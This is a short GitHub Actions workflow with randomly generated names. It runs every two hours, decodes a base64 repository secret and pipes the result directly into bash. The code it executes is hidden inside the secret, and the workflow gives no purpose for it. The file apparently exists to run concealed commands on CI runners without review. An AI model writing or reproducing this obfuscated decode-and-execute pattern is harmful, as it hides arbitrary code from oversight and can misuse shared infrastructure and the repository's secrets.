name: zioWcb
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  tcmdDUsgr:
    runs-on: ubuntu-latest
    env:
      ifiFPhdzP: ${{ secrets.XZuuSd }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.EvqzvHE }}" | base64 -d | bash
